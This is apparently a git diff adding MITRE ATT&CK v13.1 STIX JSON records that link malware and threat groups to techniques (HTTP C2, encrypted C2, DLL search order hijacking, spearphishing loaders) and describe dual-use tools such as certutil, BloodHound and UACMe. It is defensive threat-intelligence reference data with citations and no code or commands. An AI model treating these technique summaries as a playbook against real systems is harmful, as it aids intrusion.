@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--7cd09348-4eea-4c65-b15a-b734da3043d5", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ffd3ead2-b1a0-46fa-adf0-d13ece7597e8", + "created": "2023-03-06T23:27:22.298Z", + "revoked": false, + "external_references": [ + { + "source_name": "Secureworks DarkTortilla Aug 2022", + "description": "Secureworks Counter Threat Unit Research Team. (2022, August 17). DarkTortilla Malware Analysis. Retrieved November 3, 2022.", + "url": "https://www.secureworks.com/research/darktortilla-malware-analysis" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-06T23:27:22.298Z", + "description": "[DarkTortilla](https://attack.mitre.org/software/S1066) has used HTTP and HTTPS for C2.(Citation: Secureworks DarkTortilla Aug 2022)", + "relationship_type": "uses", + "source_ref": "malware--5faaf81a-aa5b-4a4b-bae5-522439e068f8", + "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffe0659a-ff5b-4ffb-a842-38bb630fd6b8.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffe0659a-ff5b-4ffb-a842-38bb630fd6b8.json new file mode 100644 index 0000000000000000000000000000000000000000..2ebb80377bed07ac8dfd3a67c7281e08b562211c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffe0659a-ff5b-4ffb-a842-38bb630fd6b8.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--590a0e45-8bc9-40ae-a83e-6cf1290a0888", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ffe0659a-ff5b-4ffb-a842-38bb630fd6b8", + "type": "relationship", + "created": "2021-11-22T15:02:15.265Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-03-08T20:59:20.895Z", + "description": "Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--90f39ee1-d5a3-4aaa-9f28-3b42815b0d46", + "target_ref": "attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffe85478-e3ed-4856-b4ae-03a7b693e381.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffe85478-e3ed-4856-b4ae-03a7b693e381.json new file mode 100644 index 0000000000000000000000000000000000000000..8cbeb7f0e8d422bc1c637c737a744247004ef6a1 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffe85478-e3ed-4856-b4ae-03a7b693e381.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--0575f5a0-a0d2-4c3b-a8b7-c1a2e13dcd46", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ffe85478-e3ed-4856-b4ae-03a7b693e381", + "created": "2022-08-09T18:36:00.430Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Unit 42 PingPull Jun 2022", + "description": "Unit 42. (2022, June 13). GALLIUM Expands Targeting Across Telecommunications, Government and Finance Sectors With New PingPull Tool. Retrieved August 7, 2022.", + "url": "https://unit42.paloaltonetworks.com/pingpull-gallium/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:40:38.950Z", + "description": "[PingPull](https://attack.mitre.org/software/S1031) can use AES, in cipher block chaining (CBC) mode padded with PKCS5, to encrypt C2 server communications.(Citation: Unit 42 PingPull Jun 2022)", + "relationship_type": "uses", + "source_ref": "malware--3a0f6128-0a01-421d-8eca-e57d8671b1f1", + "target_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffecf9e6-6966-4535-934f-4fd4696875b0.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffecf9e6-6966-4535-934f-4fd4696875b0.json new file mode 100644 index 0000000000000000000000000000000000000000..63563210596de5204637a015d28a8f12abd4469e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffecf9e6-6966-4535-934f-4fd4696875b0.json 
@@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--3aa1c320-f4e3-4970-860d-042bb23b46d2", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ffecf9e6-6966-4535-934f-4fd4696875b0", + "type": "relationship", + "created": "2020-08-13T16:45:46.972Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Threatpost Hancitor", + "url": "https://threatpost.com/spammers-revive-hancitor-downloader-campaigns/123011/", + "description": "Tom Spring. (2017, January 11). Spammers Revive Hancitor Downloader Campaigns. Retrieved August 13, 2020." + }, + { + "source_name": "FireEye Hancitor", + "url": "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html", + "description": "Anubhav, A., Jallepalli, D. (2016, September 23). Hancitor (AKA Chanitor) observed using multiple attack approaches. Retrieved August 13, 2020." + } + ], + "modified": "2020-09-02T19:54:00.926Z", + "description": "[Hancitor](https://attack.mitre.org/software/S0499) has decoded Base64 encoded URLs to insert a recipient\u2019s name into the filename of the Word document. [Hancitor](https://attack.mitre.org/software/S0499) has also extracted executables from ZIP files.(Citation: Threatpost Hancitor)(Citation: FireEye Hancitor)", + "relationship_type": "uses", + "source_ref": "malware--ef2247bf-8062-404b-894f-d65d00564817", + "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffee4cd1-f193-4dbc-9f47-6fe47e1523eb.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffee4cd1-f193-4dbc-9f47-6fe47e1523eb.json new file mode 100644 index 0000000000000000000000000000000000000000..f4f736fc13865c954804b4d71420f10308c34355 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffee4cd1-f193-4dbc-9f47-6fe47e1523eb.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--6e40e529-efaf-449a-bbed-4de748618039", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ffee4cd1-f193-4dbc-9f47-6fe47e1523eb", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "PWC Cloud Hopper April 2017", + "url": "https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf", + "description": "PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved April 5, 2017." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[menuPass](https://attack.mitre.org/groups/G0045) has used DLL search order hijacking.(Citation: PWC Cloud Hopper April 2017)", + "modified": "2022-07-20T20:07:40.187Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "intrusion-set--222fbd21-fc4f-4b7e-9f85-0e6e3a76c33f", + "target_ref": "attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--fff3195c-ef40-4e11-b0f3-f1a849b2b316.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--fff3195c-ef40-4e11-b0f3-f1a849b2b316.json new file mode 100644 index 0000000000000000000000000000000000000000..19f0e861c8e40cecfa4df28dc5aee06ceab7c1fe --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--fff3195c-ef40-4e11-b0f3-f1a849b2b316.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--13d28e85-3eb8-4ffa-a992-7973ddc254f5", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--fff3195c-ef40-4e11-b0f3-f1a849b2b316", + "created": "2022-07-21T17:01:09.524Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "TrendMicro EarthLusca 2022", + "description": "Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca\u2019s Operations. Retrieved July 1, 2022.", + "url": "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-02T19:02:05.756Z", + "description": "[Earth Lusca](https://attack.mitre.org/groups/G1006) has sent spearphishing emails that required the user to click on a malicious link and subsequently open a decoy document with a malicious loader.(Citation: TrendMicro EarthLusca 2022)", + "relationship_type": "uses", + "source_ref": "intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034", + "target_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffff35dc-3741-4fba-9680-f0fbe321c0b0.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffff35dc-3741-4fba-9680-f0fbe321c0b0.json new file mode 100644 index 0000000000000000000000000000000000000000..360f814d0e77cb7bc33864c5cbff116f642d583e --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffff35dc-3741-4fba-9680-f0fbe321c0b0.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--0a437a02-f637-4466-97d9-5f2cb8a7321c", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ffff35dc-3741-4fba-9680-f0fbe321c0b0", + "created": "2022-01-27T18:04:46.484Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Talos Bisonal Mar 2020", + "url": "https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html", + "description": "Mercer, W., et al. (2020, March 5). Bisonal: 10 years of play. Retrieved January 26, 2022." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": " [Bisonal](https://attack.mitre.org/software/S0268) dropped a decoy payload with a .jpg extension that contained a malicious Visual Basic script.(Citation: Talos Bisonal Mar 2020) ", + "modified": "2022-04-18T21:25:59.054Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--65ffc206-d7c1-45b3-b543-f6b726e7840d", + "target_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffffed15-5695-44b9-b85b-89ba8187415d.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffffed15-5695-44b9-b85b-89ba8187415d.json new file mode 100644 index 0000000000000000000000000000000000000000..82de6561c3cd6222067d62e09824064c6c421c66 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffffed15-5695-44b9-b85b-89ba8187415d.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--8a51bf59-9c37-443b-a718-a74f7ac3a6c0", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ffffed15-5695-44b9-b85b-89ba8187415d", + "type": "relationship", + "created": "2019-09-24T14:19:05.322Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos ZxShell Oct 2014", + "url": "https://blogs.cisco.com/security/talos/opening-zxshell", + "description": "Allievi, A., et al. (2014, October 28). Threat Spotlight: Group 72, Opening the ZxShell. Retrieved September 24, 2019." + } + ], + "modified": "2022-01-05T16:34:01.994Z", + "description": "[ZxShell](https://attack.mitre.org/software/S0412) has a command to transfer files from a remote host.(Citation: Talos ZxShell Oct 2014) ", + "relationship_type": "uses", + "source_ref": "malware--cfc75b0d-e579-40ae-ad07-a1ce00d49a6c", + "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--03342581-f790-4f03-ba41-e82e67392e23.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--03342581-f790-4f03-ba41-e82e67392e23.json new file mode 100644 index 0000000000000000000000000000000000000000..b481219d006743b1274de4372acf4ff3ef4e7fc5 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--03342581-f790-4f03-ba41-e82e67392e23.json 
@@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--02a1127d-828c-4e39-b21b-b11c837f860b", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-03T16:49:41.059Z", + "name": "Net", + "description": "The [Net](https://attack.mitre.org/software/S0039) utility is a component of the Windows operating system. It is used in command-line operations for control of users, groups, services, and network connections. (Citation: Microsoft Net Utility)\n\n[Net](https://attack.mitre.org/software/S0039) has a great deal of functionality, (Citation: Savill 1999) much of which is useful for an adversary, such as gathering system and network information for Discovery, moving laterally through [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) using net use commands, and interacting with services. The net1.exe utility is executed for certain functionality when net.exe is run and can be used directly in commands such as net1 user.", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "2.4", + "x_mitre_contributors": [ + "David Ferguson, CyberSponse" + ], + "x_mitre_aliases": [ + "Net", + "net.exe" + ], + "type": "tool", + "id": "tool--03342581-f790-4f03-ba41-e82e67392e23", + "created": "2017-05-31T21:32:31.601Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0039", + "external_id": "S0039" + }, + { + "source_name": "Microsoft Net Utility", + "description": "Microsoft. (2006, October 18). Net.exe Utility. Retrieved September 22, 2015.", + "url": "https://msdn.microsoft.com/en-us/library/aa939914" + }, + { + "source_name": "Savill 1999", + "description": "Savill, J. (1999, March 4). Net.exe reference. 
Retrieved September 22, 2015.", + "url": "http://windowsitpro.com/windows/netexe-reference" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--03c6e0ea-96d3-4b23-9afb-05055663cf4b.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--03c6e0ea-96d3-4b23-9afb-05055663cf4b.json new file mode 100644 index 0000000000000000000000000000000000000000..686d9cfb252bcaffef94297983f842b763a8aac4 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--03c6e0ea-96d3-4b23-9afb-05055663cf4b.json 
@@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--a9e56009-375e-41d5-9707-bb7f2bb3cac1", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "RemoteUtilities" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--03c6e0ea-96d3-4b23-9afb-05055663cf4b", + "type": "tool", + "created": "2021-03-18T14:57:34.628Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0592", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0592" + }, + { + "source_name": "Trend Micro Muddy Water March 2021", + "url": "https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html", + "description": "Peretz, A. and Theck, E. (2021, March 5). Earth Vetala \u2013 MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021." + } + ], + "modified": "2021-04-25T23:30:38.375Z", + "name": "RemoteUtilities", + "description": "[RemoteUtilities](https://attack.mitre.org/software/S0592) is a legitimate remote administration tool that has been used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least 2021 for execution on target machines.(Citation: Trend Micro Muddy Water March 2021)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--066b057c-944e-4cfc-b654-e3dfba04b926.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--066b057c-944e-4cfc-b654-e3dfba04b926.json new file mode 100644 index 0000000000000000000000000000000000000000..e9a744eed92799bf7281f4c3c51bfc5b4a13df6a --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--066b057c-944e-4cfc-b654-e3dfba04b926.json 
@@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--d868ddb1-4f5c-4976-a899-4bf00e1c7eb7", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-02-16T18:51:10.090Z", + "name": "BloodHound", + "description": "[BloodHound](https://attack.mitre.org/software/S0521) is an Active Directory (AD) reconnaissance tool that can reveal hidden relationships and identify attack paths within an AD environment.(Citation: GitHub Bloodhound)(Citation: CrowdStrike BloodHound April 2018)(Citation: FoxIT Wocao December 2019)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.4", + "x_mitre_aliases": [ + "BloodHound" + ], + "type": "tool", + "id": "tool--066b057c-944e-4cfc-b654-e3dfba04b926", + "created": "2020-10-28T12:51:29.358Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0521", + "external_id": "S0521" + }, + { + "source_name": "FoxIT Wocao December 2019", + "description": "Dantzig, M. v., Schamper, E. (2019, December 19). Operation Wocao: Shining a light on one of China\u2019s hidden hacking groups. Retrieved October 8, 2020.", + "url": "https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf" + }, + { + "source_name": "CrowdStrike BloodHound April 2018", + "description": "Red Team Labs. (2018, April 24). Hidden Administrative Accounts: BloodHound to the Rescue. Retrieved October 28, 2020.", + "url": "https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/" + }, + { + "source_name": "GitHub Bloodhound", + "description": "Robbins, A., Vazarkar, R., and Schroeder, W. (2016, April 17). Bloodhound: Six Degrees of Domain Admin. 
Retrieved March 5, 2019.", + "url": "https://github.com/BloodHoundAD/BloodHound" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--0a68f1f1-da74-4d28-8d9a-696c082706cc.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--0a68f1f1-da74-4d28-8d9a-696c082706cc.json new file mode 100644 index 0000000000000000000000000000000000000000..fdfd561ed1cc324377414dc705cfcbcb3b3beb41 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--0a68f1f1-da74-4d28-8d9a-696c082706cc.json 
@@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--a767661c-b3ca-4842-a9fb-99e4524e15cb", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-03T00:40:22.280Z", + "name": "certutil", + "description": "[certutil](https://attack.mitre.org/software/S0160) is a command-line utility that can be used to obtain certificate authority information and configure Certificate Services. (Citation: TechNet Certutil)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.3", + "x_mitre_aliases": [ + "certutil", + "certutil.exe" + ], + "type": "tool", + "id": "tool--0a68f1f1-da74-4d28-8d9a-696c082706cc", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0160", + "external_id": "S0160" + }, + { + "source_name": "TechNet Certutil", + "description": "Microsoft. (2012, November 14). Certutil. Retrieved July 3, 2017.", + "url": "https://technet.microsoft.com/library/cc732443.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--0c8465c0-d0b4-4670-992e-4eee8d7ff952.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--0c8465c0-d0b4-4670-992e-4eee8d7ff952.json new file mode 100644 index 0000000000000000000000000000000000000000..dc6af6ffa093c43bd0de0c267069a9a3cc75768f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--0c8465c0-d0b4-4670-992e-4eee8d7ff952.json 
@@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--c5d0d0c4-d5d8-4ee5-9724-4c806cfc5269", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-09-22T20:56:56.049Z", + "name": "at", + "description": "[at](https://attack.mitre.org/software/S0110) is used to schedule tasks on a system to run at a specified date or time.(Citation: TechNet At)(Citation: Linux at)", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.3", + "x_mitre_aliases": [ + "at", + "at.exe" + ], + "type": "tool", + "id": "tool--0c8465c0-d0b4-4670-992e-4eee8d7ff952", + "created": "2017-05-31T21:33:06.824Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0110", + "external_id": "S0110" + }, + { + "source_name": "Linux at", + "description": "IEEE/The Open Group. (2017). at(1p) \u2014 Linux manual page. Retrieved February 25, 2022.", + "url": "https://man7.org/linux/man-pages/man1/at.1p.html" + }, + { + "source_name": "TechNet At", + "description": "Microsoft. (n.d.). At. Retrieved April 28, 2016.", + "url": "https://technet.microsoft.com/en-us/library/bb490866.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--102c3898-85e0-43ee-ae28-62a0a3ed9507.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--102c3898-85e0-43ee-ae28-62a0a3ed9507.json new file mode 100644 index 0000000000000000000000000000000000000000..3c24f9b788aaa9dd2ceba4faecdf8d7c7948f4f4 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--102c3898-85e0-43ee-ae28-62a0a3ed9507.json @@ -0,0 +1,40 @@ +{ + "type": "bundle", + "id": "bundle--7752a3bb-9f78-4f95-9a8a-c1037db8e111", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--102c3898-85e0-43ee-ae28-62a0a3ed9507", + "type": "tool", + "created": "2017-05-31T21:33:09.047Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0116", + "external_id": "S0116" + }, + { + "source_name": "Github UACMe", + "description": "UACME Project. (2016, June 16). UACMe. Retrieved July 26, 2016.", + "url": "https://github.com/hfiref0x/UACME" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "UACMe", + "description": "[UACMe](https://attack.mitre.org/software/S0116) is an open source assessment tool that contains many methods for bypassing Windows User Account Control on multiple versions of the operating system. (Citation: Github UACMe)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--115f88dd-0618-4389-83cb-98d33ae81848.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--115f88dd-0618-4389-83cb-98d33ae81848.json new file mode 100644 index 0000000000000000000000000000000000000000..1b5b1fcebe74562d0b63dd8d0011a467d13195f2 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--115f88dd-0618-4389-83cb-98d33ae81848.json 
@@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--14085587-a127-4b2a-8c81-940349e07194", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "ShimRatReporter" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--115f88dd-0618-4389-83cb-98d33ae81848", + "type": "tool", + "created": "2020-05-12T21:29:48.294Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0445", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0445" + }, + { + "source_name": "FOX-IT May 2016 Mofang", + "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf", + "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020." + } + ], + "modified": "2020-05-27T22:39:28.701Z", + "name": "ShimRatReporter", + "description": "[ShimRatReporter](https://attack.mitre.org/software/S0445) is a tool used by suspected Chinese adversary [Mofang](https://attack.mitre.org/groups/G0103) to automatically conduct initial discovery. The details from this discovery are used to customize follow-on payloads (such as [ShimRat](https://attack.mitre.org/software/S0444)) as well as set up faux infrastructure which mimics the adversary's targets. [ShimRatReporter](https://attack.mitre.org/software/S0445) has been used in campaigns targeting multiple countries and sectors including government, military, critical infrastructure, automobile, and weapons development.(Citation: FOX-IT May 2016 Mofang)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": 